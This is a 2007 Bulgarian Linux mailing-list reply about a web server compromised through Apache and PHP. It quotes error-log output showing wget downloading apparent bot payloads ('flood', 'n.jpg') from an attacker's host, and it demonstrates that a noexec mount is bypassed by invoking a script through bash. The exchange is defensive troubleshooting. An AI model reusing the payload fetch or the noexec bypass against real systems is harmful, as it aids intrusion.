Re: [Lug-bg] пробив през апаче и пхп : (
- Subject: Re: [Lug-bg] пробив през апаче и пхп : (
- From: "Iassen Anadoliev" <korio@xxxxxxxxx>
- Date: Thu, 12 Jul 2007 10:54:27 +0300 (EEST)
- Importance: Normal
On Wed, July 11, 2007 11:16 pm, deb4o wrote:
> няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на
> irc bot
> все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги
> страртират.
> но искам да разбера къде е дупката в апачето.
> Apache 2.0.53 и php 4.3.9
>
> Така и не мога да разбера от къде влизат. търсих по логовете но само
> единственно в error log-a на апачето намирам подобни на тези неща:
>
> --00:43:08-- http://private.whitehat.ro/flood
> => `flood'
> Resolving private.whitehat.ro... 72.22.77.22
> Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 208,412 [text/plain]
>
> 0K .......... .......... .......... .......... .......... 24% 60.12
> KB/s
> 50K .......... .......... .......... .......... .......... 49% 237.64
> KB/s
> 100K .......... .......... .......... .......... .......... 73% 16.05
> KB/s
> 150K .......... .......... .......... .......... .......... 98% 60.06
> KB/s
> 200K ... 100% 10.13
> MB/s
>
> 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412]
>
> -------------------
> --11:39:45-- http://private.whitehat.ro/n.jpg
> => `n.jpg'
> Resolving private.whitehat.ro... 72.22.77.22
> Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 261,375 [image/jpeg]
>
> 0K .......... .......... .......... .......... .......... 19% 60.85
> KB/s
> 50K .......... .......... .......... .......... .......... 39% 122.81
> KB/s
> 100K .......... .......... .......... .......... .......... 58% 16.38
> KB/s
> 150K .......... .......... .......... .......... .......... 78% 61.60
> KB/s
> 200K .......... .......... .......... .......... .......... 97% 81.52
> KB/s
> 250K ..... 100% 1.02
> MB/s
>
> 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375]
>
> _______________________________________________
> Lug-bg mailing list
> Lug-bg@xxxxxxxxxxxxxxxxxx
> http://linux-bulgaria.org/mailman/listinfo/lug-bg
>
Малко оффтопик, но nosuid,noexec е лека заблуда на противника:
test:~# dd if=/dev/zero of=fs bs=1k count=100
100+0 records in
100+0 records out
102400 bytes (102 kB) copied, 0.000681537 seconds, 150 MB/s
test:~# losetup -f fs
test:~# mkfs.ext3 /dev/loop0
mke2fs 1.40-WIP (14-Nov-2006)
Filesystem label=
OS type: Linux
<snip>
</snip>
test:~#
test:~# mount -o loop,nosuid,noexec fs mnt
test:~# mount|grep mnt
/root/fs on /root/mnt type ext2 (rw,noexec,nosuid,loop=/dev/loop1)
test:~#
test:~/mnt# cat << EOF > test
> #!/bin/bash
> echo test
> EOF
test:~/mnt#
test:~/mnt# chmod 0755 test
test:~/mnt# ./test
-su: ./test: /bin/bash: bad interpreter: Permission denied
test:~/mnt# /bin/bash test
test
test:~/mnt#
Пробвай safe_mode :)
--
WWell by
Iassen Anadoliev
_______________________________________________
Lug-bg mailing list
Lug-bg@xxxxxxxxxxxxxxxxxx
http://linux-bulgaria.org/mailman/listinfo/lug-bg
|
